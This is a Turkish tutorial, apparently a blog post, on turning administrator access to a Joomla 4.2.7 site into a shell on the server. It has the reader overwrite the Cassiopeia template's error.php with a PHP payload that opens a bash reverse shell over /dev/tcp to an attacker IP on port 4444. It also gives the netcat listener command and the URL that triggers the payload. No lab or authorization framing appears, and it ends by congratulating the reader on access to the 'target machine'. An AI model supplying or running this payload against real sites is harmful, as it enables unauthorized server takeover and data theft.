Herkese Merhaba 👋Bugün çok spesifik ve bir o kadar da kritik bir konuyu anlatacağım. Bu öğreneceğiniz tekniği başka platformlara da uyarlayabilirsiniz. Makalemiz Joomla yönetim panelini kullanarak Remote Code Execution zafiyeti ile hedef makineye erişim sağlamak üzerine olacak. Başlayalım…
Administrator Paneline Giriş Sonrası
Bu yazımda administrator paneline girişi anlatmayacağım. Yönetim paneline erişim sağlandıktan sonraki kısımları anlatacağım.
Dashboard ekranı bu şekilde. Sürüm farklarından dolayı sömüreceğimiz Site Templates başka yerlerde olabilir. Kısa bir Google araması ile yerini bulabilirsiniz.
Joomla 4.2.7 sürümünde sol taraftaki panelde bulunun System sekmesine gitmemiz gerekiyor.
Burada çeşitli sekmeler önümüze geliyor. Bizi ilgilendiren Kısım Templates sekmesi altında bulunuyor.
Bu kısıma tıklıyoruz.
Karşımıza sitede kullanılan templates kısmı geliyor. Burada bu kullanılan dosyasının üzerine tıklayarak içeri giriyoruz.
Burada karşımıza bu templates ile ilgili dosyalar geliyor. Bizi ilgilendiren kısım error.php dosyası.
Zafiyetin Sömürülmesi
error.php dosyasına girdiğimizde karşımıza yapılandırma komutları çıkıyor.
Burada bu komutları siliyoruz ve bizim için çalıştırmasını istediğimiz komutu yazıyoruz.
Vereceğim payload değerini bu şekilde buraya yazın.
<?php system("/bin/bash -c 'bash -i >& /dev/tcp/<IP_ADRESS>/4444 0>&1'"); ?>Ve dosyamızı kaydedelim.
Şimdi kendi makinemizde dinleme modunu açalım ki karşıdaki makine bize gelebilsin.
nc -lvnp 4444Şimdi yapmamız gereken şey error.php dosyasını tetiklemek.
Dosyası düzenlerken error.php dosyasının endpoint değerini burada görmüştük.
Herşey hazırsa artık son aşamaya geldik.
Tarayıcımızdan gerekli endpoint değerine gidelim.
http://site_adresi/templates/cassiopeia/error.php
Tebrikler! Artık karşı makinede erişim sağladınız. Bundan sonra yapabilecekleriniz sizin yeteneğinize ve bilgi birikinize kalmış.
Bir sonraki yazıda görüşmek üzere.
Güçlü ve Onurlu kalın…